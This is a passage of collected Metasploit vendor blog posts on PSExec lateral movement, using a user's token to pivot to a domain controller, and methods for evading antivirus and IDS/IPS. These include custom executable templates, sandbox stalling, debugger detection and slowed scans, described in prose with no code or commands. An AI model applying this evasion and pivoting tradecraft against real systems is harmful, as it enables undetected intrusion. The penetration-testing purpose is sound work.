Service image uploaded by the PSExec utility – similar to the PSExec service. The exploit then uploads the service executable to the Admin$ share using the supplied credentials, connects to the DCE/RPC interface, and calls into the Service Control Manager before telling SCM to start the service that we deployed to Admin$ earlier. When the service is started, it starts a new rundll32.exe process, allocates executable memory inside that process and copies the shellcode into it. It then calls the starting address of that memory location as if it were a function pointer, executing the stored shellcode.The service EXE is generated using an executable template with a placeholder where the shellcode is inserted. The default executable templates in Metasploit Framework are flagged by major AV solutions because most anti-virus vendors have signatures for detecting these templates. No matter what payload you stick in this executable template, it will get flagged by AV.AV EvasionThe PSExec exploit has several advanced options. The first is the options to supply alternative executable templates.There are two separate options: One is to use set EXE::Path, which will tell Metasploit to look in a different directory for the executable templates. The other is set EXE::Template, which is the name of the executable template file to use. If you create an executable template and store it in a different directory, you will need to set both of these options. Writing a custom executable template is a good way to avoid AV detection. If you write your own EXE template for the PSExec exploit, it must be a Windows service image.                                                   In addition to writing a custom executable template, you can write an entire executable on your own. This means that a Metasploit payload will not actually get inserted. You will code the entire behavior into the EXE itself. The psexec exploit module will then upload the EXE and try to start it via SCM.Tip: If you would like to save time evading anti-virus, you can use the dynamic executable option in Metasploit Pro, which generates random executable files each time that are much less likely to be detected by anti-virus. (Watch my webcast Evading Anti-virus Detection with Metasploit for more info.)The Management Object File (MOF) upload methodMOF files are a part of the Windows Management Instrumentation (WMI). They are Manage Object Files. They contain WMI information and instructions. MOF files must be compiled to work properly, however there is a way around that on Windows XP.  In Windows XP, if you drop an uncompiled MOF file in the system32\wbem\mof\ directory, Windows XP will compile the MOF for you and run it.  The PSExec exploit has a method for using this to our advantage. If you set MOF_UPLOAD_METHOD true, it will do a few things differently. Our payload EXE will be generated as a normal instead of a service EXE. It will then upload it via Admin$ as expected before generating a MOF file that will execute the EXE we uploaded. It will use Admin$ to deploy the MOF file to the MOF directory. Windows XP will then compile and run the MOF, causing our payload EXE to be executed.The MOF method can be combined with the custom EXE or custom template methods described above to try and evade AV as well. The MOF Method currently only works on Windows XP as later versions require the MOF to already be compiled in order for them to run.The PSExec Current User Local Exploit(exploit/windows/local/current_user_psexec)The Current User PSExec module is a local exploit. This means it is an exploit run on an already established session. Let's set up a scenario to explain how this works. In our scenario you do the following:Set up a browser exploit at some addressTrick a local system administrator to visiting the siteGet a reverse Meterpreter shell, inside the administrator's browser processRun netstat to see if the administrator is connected to one of the Domain controllersSo now Meterpreter is running on a system administrator's box under her user context. While there may not be something you're interested in on her workstation, she has permission to access a domain controller (DC), which you would like to shell. You don't have her credentials, and you cannot talk directly to the DC from your box.This is where the current_user_psexec module comes in. This local exploit works the same way as the psexec exploit. However, it runs from the victim machine. You also do not supply any credentials. This exploit takes the authentication token from the user context, and passes that alone. This means you can get a shell on any box the user can connect to from that machine and has permissions on, without actually knowing what their credentials are.This is an invaluable technique to have in your toolbox.  From that first machine you can compromise numerous other machines. You can do this without having set up any proxy or VPN pivots, and you will have done it using legitimate means of access.The PSExec Command Execution Module (auxiliary/admin/smb/psexec_command)Submitted by community contributor Royce @R3dy__ Davis, this module expands upon the usefulness of the PSExec behavior. It utilizes the same basic technique but does not upload any binaries. Instead it issues a single Windows command to the system. This command is then run by the remote system. This allows arbitrary commands to be executed on the remote system without sending any payloads that could be detected by AV. While it does not get you a shell, it will allow you to perform specific one off actions on the system that you may need.The PSExec Logged In Users Module (auxiliary/scanner/smb/psexec_loggedin_users)Also brought to you by Royce @R3dy__ Davis, this module is a specialized version of the command execution one. It uses the same technique to specifically query the registry on the remote machine and get a list of all currently logged on users. It is a scanner module which means it can also run against numerous hosts simultaneously, quickly getting the information from all the targeted hosts.SummaryWhat we've seen here is that the PSExec technique is actually a relatively simple mechanism with immense benefit. We should all remember to thank Mark Russinovich for this wonderful gift he has given us. As time goes by, people will find many more uses for this same technique, and there is room for improvement on how these modules work and interact. The PSExec exploits are two of the most useful, and most reliable, techniques for getting shells in the entire Metasploit Framework.[ETA] If you're looking for more information on PSExec, there's more information in this Whiteboard Wednesday video -- How PSExec and Remote Execution Work:

Evading Anti-Virus Detection - Whiteboard Wednesday

In today's Whiteboard Wednesday, David Maloney explains anti-virus evasion techniques for Metasploit. In order to make the most of Metasploit pen testing techniques in delivering payloads, you need to be able to deliver those payloads without anti-virus flagging them. David walks us through a few…

In today's Whiteboard Wednesday, David Maloney explains anti-virus evasion techniques for Metasploit. In order to make the most of Metasploit pen testing techniques in delivering payloads, you need to be able to deliver those payloads without anti-virus flagging them. David walks us through a few examples on how to bypass anti-virus detection so you can easily pen test your systems.Watch the video here!Interested in some more information? Make sure to read David's blog post on the topic, and be sure to register for next week's webcast where David will present a deep dive on how to best evade AV with Metasploit.Make sure to check in next week for our next episode of Whiteboard Wednesday.

The Odd Couple: Metasploit and Antivirus Solutions

I hear a lot of questions concerning antivirus evasion with Metasploit, so I'd like to share some the information critical to understanding this problem. This blog post is not designed to give you surefire antivirus (AV) evasion techniques, but rather to help you understand the…

I hear a lot of questions concerning antivirus evasion with Metasploit, so I'd like to share some the information critical to understanding this problem. This blog post is not designed to give you surefire antivirus (AV) evasion techniques, but rather to help you understand the fundamentals of the issue.A Quick GlossaryBefore we begin, let's define a few terms. This will be important for understanding some of the things we will discuss.Payload: A payload is the actual code that is being delivered to a victim by an exploit.Signature: In the antivirus world, signatures are the most basic form of detection. A signature is a set of rules or pattern match against code. Signatures are based on known examples of malicious code. For a real life analogy, think of those artists sketches the police put on the news when they are looking for a criminal. They are meant to convey enough detail so that people can easily recognize someone who is known to be dangerous.Heuristics: Heuristics are the attempt to identify malicious code by matching specific behavior instead of exact patterns in that code. It watches the way the code runs, and determines dangerous behavior based on more complex sets of rules.Sandbox: AV sandboxes are protected segments in the operating system, where code can be run safely. It prevents that code from harming important parts of the OS. AV can run malicious code in a sandbox while it uses heuristic detection to determine if it's safe. Because these sandboxes could seriously slow down operation of the system, it usually only runs for a brief period then releases the code if nothing malicious is detected.PayloadsThe first thing we need to understand is how payloads work in Metasploit. When talking about payloads, there are two different kinds of payload we need to understand.Singles: A single payload is a piece of standalone shellcode that is generated in one step and that performs a single discrete task, for example the Windows Add User Payload.Staged: Staged payloads are componentized payloads, which are used to get larger more complex payloads to the target when there isn't enough space in the exploit. Staged payloads are broken down into stages, hence the name.Stage 1: Also know as ‘the stager', is a relatively small bit of shellcode that opens a communication channel back to a payload handler running in Metasploit. The handler then sends the stager back the next stage of the payload, which is placed into memory and executed. Examples of stagers include: bind_tcp, reverse_tcp, reverse_http, and reverse_https among others.Stage 2: Is what will actually be setting up our payload to run in memory. In the case of Meterpreter, this will load the basic Meterpreter skeleton into memory, which downloads the Meterpreter libraries and extensions from Metasploit.Many times when people say that AV is catching Meterpreter, it is actually the stager that is getting flagged. These stagers are fairly recognizable, and are the easiest path for AV to try and block our payloads.Executable TemplatesIn many scenarios, the exploit directly writes the stager into the memory of the application being exploited. However, in some cases Metasploit has to deliver payloads through vulnerabilities other than memory corruption. This is where executable templates come in handy. We cannot simply write a blob of shellcode to the machine and expect it to execute; we need a properly formatted executable file that will handle this for us.An executable template is primarily responsible for one job: It grabs space in memory, writes stager shellcode (or a single payload) into that space, and executes it. These executable templates come in many flavors, but PECoff (executable file) and ELF binaries are the most common.When an executable payload is generated in Metasploit as part of an exploit, or generated through something like MSFVenom, a set of default templates are used. Most of the AV vendors have added static signatures for these default templates. These signatures don't even look for a payload; they just look for the executable template. Look what happens when we upload one of these empty templates to VirusTotal:There is nothing actually malicious in that executable but 33 different AV products pick it up. This is a lazy but effective technique on the AV Vendors' parts. Since they know a lot of Metasploit payloads will be wrapped in these specific binaries, they create some static signatures and then go on to other things.How do we get around this issue? Well the most obvious answer is to use a different executable template. When using an exploit that leverages an executable payload, there are advanced options available for the use of custom templates. To see this, select the psexec module and hit ‘show advanced'. You'll see these options under advanced options:There are a lot of different considerations when selecting an executable template: You could try to use an existing executable that is known to be safe, and try to hide your payload there. Some of the advanced options above exactly do that. For more information on this approach, I also highly recommend Chris Gates' blog post: Carnal0wnage; Attack Research Blog: Msfencode a Msfpayload Into An Existing ExecutableYou could also write and compile your own template, enabling you to do all sorts of complex and dirty tricks in your template. We'll talk a little more on this later on when we discuss the dynamic executable option available in Metasploit Pro.The Encoder MythMany users seem to be confused about what encoders are for: “AV keeps picking up my payload no matter what encoder I try.” Encoders are not meant to evade AV but handle bad characters. When dealing with memory corruption exploits some characters may break your exploit. In most cases, a null byte anywhere in the payload will cause it to fail. Depending on the protocol, other characters may cause unintended results. Common characters for this are space, tab, carriage return, and line feed, among others.Encoders are designed to modify the payload so that it will work for a given exploit, avoiding a known set of bad characters and size limitation. There are many different ways we can go about this.Newer, more advanced encoders actually use a rolling XOR encoding to create polymorphic code. The encoder uses a rolling XOR on the payload creating an encoded data stream. It then prepends a decoder stub to it. When the payload is delivered, the decoder stub triggers first, decoding the payload back into executable shell code in memory. The payload is unrecognizable until it runs. This has, in the past, created the unintended side effect of helping to evade antivirus, and is probably responsible for the creation of the Encoder Myth.However, any decent heuristic detection inside AV will not be fooled by this simple obfuscation. Furthermore the decoder stub itself will tend to be fairly recognizable and could potentially be caught with signature-based detection.Another way to evade AV is through the creation of new polymorphic encoders, obfuscating the code and creating currently unrecognized decoder stubs. This is a stopgap measure, as AV eventually creates signatures for the new decoder stubs, and is still not be particularly effective against heuristic detection.Dynamic Executable Templates in Metasploit ProStarting with version 4.4, Metasploit Pro offers the option to dynamically generate executable templates when using the psexec module, which can be selected from Advanced Options when running the PSExec module, or Payload Settings in the Bruteforcer when selecting SMB.The Dynamic EXE Option for PSExecDynamic EXE Option in the BruteforcerA dynamic EXE can also be generated manually using the exploits/pro/windows/dynamic_exe module. This will generate a dynamic exe on Metasploit Pro's local file system. The payload can then be delivered by various out-of-band methods.The purpose of the dynamic executable generator is to avoid AV detection. It generates the C code for the executable template, and includes the payload directly, instead of injecting it after the template has been generated. The C code is written in a random, on-the-fly fashion and compiled with Metasm. It uses several techniques to try and evade AV.Dynamic NatureThe code is completely different every time it is generated, using randomized procedurally created C functions, which are then assembled into randomized call trees. This means that the code is different every time; the execution flow also doesn't fall into any predictable patterns either. Metasploit Pro initializes random variables and scrambles them with other, required variables so that the significant variables are never mapped into the same place in memory. The actual functions are different every time, the execution flow is different every time, and the memory layout is different every time. This makes it virtually impossible for AV vendors to create a static signature for detection of these payloads.You could say we are exploiting the fundamental flaw with signature based detection. The amount of work to maintain signatures becomes overwhelming, and signatures are quickly outdated.Appear harmlessThe randomly generated C functions also fill the call tree with completely harmless, innocuous operations, which is especially important for sandboxing. As you already know, sandboxes run for a limited time and eventually release the payload. By performing only legitimate actions during that time, the sandbox will have no choice but to release our payload, at which point we can safely execute the actual payload.Hide the payloadYou are probably tired of seeing the word random, but here we go again: Metasploit Pro actually randomizes its payload in memory. The payload is read into memory completely scrambled. We then unscramble the payload only right before we execute it. This scramble is randomized each run, making it very hard to detect the payload sitting in memory.Detect debuggersLike with AV, the code can detect debuggers and stop any malicious activity, making reverse engineering of the payload much more difficult (though far from impossible).Dynamic run-time linkingAntivirus solutions also often look at the imports table of the executable. Metasploit Pro evades detection through dynamic runtime linking of all required functions, keeping the imports table almost completely empty. It also makes it harder to recognize what functions the code is actually calling.These methods make life difficult, though not impossible, for reverse engineers and antivirus solutions to analyze Metasploit payloads. In fact, Metasploit does get caught by some AV solutions, with detection rates varying from run to run.Antivirus evasion is never done. We will never be satisfied with what we've achieved. Watch this space for updates on the arms race. We intend to work hard to stay a few steps ahead.Further ReadingThis has been a quick, high level, overview of some of the concepts. For more detailed work, check out some of these links:Why Encoding Does not Matter and How Metasploit Generates EXEs; Thoughts on SecurityFacts and myths about antivirus evasion with MetasploitPentest Geek; Using Metasm To Avoid Antivirus Detection (Ghost Writing ASM)

How to Fly Under the Radar of AV and IPS with Metasploit's Stealth Features

When conducting a penetration testing assignment, one objective may be to get into the network without tripping any of the alarms, such as IDS/IPS or anti-virus. Enterprises typically add this to the requirements to test if their defenses are good enough to detect an…

When conducting a penetration testing assignment, one objective may be to get into the network without tripping any of the alarms, such as IDS/IPS or anti-virus. Enterprises typically add this to the requirements to test if their defenses are good enough to detect an advanced attacker. Here's how you can make sure you can sneak in and out without "getting caught". Scan speedFirst of all, bear in mind that you'll want to slow down your initial network scan so you don't raise suspicion by creating heavy network traffic. In the Advanced Settings of hte Discovery Scan, set your network scanning speed to Sneaky or Paranoid. This feature is included in Metasploit Community Edition, Metasploit Express, and Metasploit Pro. Evading IDS/IPS Metasploit has many different settings to evade an IDS/IPS (intrusion detection system/intrusion prevention system). Metasploit Framework enables you to set many of these manually, for example changing the transport type, encoding, fragmenting traffic. Finding the right setting to evade the IPS system can be a little tricky. If you want to make your life easier, you can use Metasploit Pro's pre-defined levels of evasion: You can choose Transport Evasions, and Application Evasions, all of which have the options of None, Low, Medium, and High. In the back-end, the tuning is different for each type of exploit. For example, if you're choosing low transport evasion, it will run the exploit a little slower and chunk it up into more segments. With higher options, we change exploit-specific settings, like the compression type, the name of the webserver, or use different Unicode encodings. You can set these IDS/IPS evasion settings in the Advanced Options of the Exploitation screen: Concurrent exploits: Reduces the number of exploits that are launched at your targets at the same time. Reduce this to ensure the attack doesn't raise any red flags.Transport evasion: Sends smaller TCP packets and increases time delay between packets to avoid detection. Application Evasion: Adjusts application-specific evasion options for exploits involving DCERPC, SMB and HTTP. The higher the setting, the more evasion techniques are applied. Social engineering When choosing the payload for social engineering campaigns, you should choose Encrypted HTTPS to ensure that your payload phones back using an encrypted session. These are harder to detect by your IDS/IPS. Social engineering campaigns are only available in Metasploit Pro. Avoiding anti-virus Even if you get past the IDS/IPS systems on the network, the anti-virus engine on the machine you're trying to exploit may stop your attack if you're not careful. A lot of AV vendors are flagging Metasploit exploits and payloads as malware because they can be used in an attack. That is also a reason why you shouldn't have a malware scanner installed on the machine you run Metasploit on - otherwise it may block your installation or exploits. If you must install an AV solution installed, ensure that you have excluded the Metasploit directory from the scans. Metasploit includes various ways to avoid anti-virus detection, which again differ between editions. Metasploit Framework and Metasploit Community share the same basic AV evasion. Metasploit Express adds a self-signed binary and templates to evade detection by anti-virus solutions. Metasploit Pro includes a Rapid7-signed binary to inject code that bypasses a white list and a persistent agent that is compiled differently every time, making it very hard to detect. To get an impression how successful Metasploit is in evading anti-virus, check out the results from our test lab in the blog post "Become invisible to anti-virus protection".How are your defenses holding up to advanced evasion techniques? Download Metasploit and register for a free Metasploit Pro trial today.

Become invisible to anti-virus protection

Wouldn't it be fantastic to be invisible for a day? Walk straight into a bank vault in the morning, be a fly on the wall in the Oval Office for lunch, and spend an evening in your favorite movie star's house. Well, now you can…

Wouldn't it be fantastic to be invisible for a day? Walk straight into a bank vault in the morning, be a fly on the wall in the Oval Office for lunch, and spend an evening in your favorite movie star's house. Well, now you can - with Metasploit! We tested our Metasploit invisibility cloak on a field day recently. Our venue of choice: an anti-virus test lab. The goal was to test how well Metasploit's anti-virus protection would hold up against the most recent versions of the world's top ten anti-virus vendors. The results were better than we had hoped for: Every single vendor had gaping holes, two didn't trigger alerts at all. I don't want to single out specific vendors, so I've anonymized the chart. In addition, exploit developers and anti-virus engines are in a constant arms race, so I don't want to disclose how we make our exploits invisible. Otherwise, the AV vendors would fix the holes, my colleagues in development would have to code through the weekend, and I would have to buy them a beer next time. Instead, they're now working on making Metasploit Pro completely invisible. If you're interested in Metasploit and anti-virus, also check out n00bznet's recent blog post on the subject.

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More

Toolkit

Make Your SIEM Project a Success with Rapid7

In this toolkit, get access to Gartner's report “Overcoming Common Causes for SIEM Solution Deployment Failures,” which details why organizations are struggling to unify their data and find answers from it. Also get the Rapid7 companion guide with helpful recommendations on approaching your SIEM needs.

Download Now

Podcast

Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee–deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now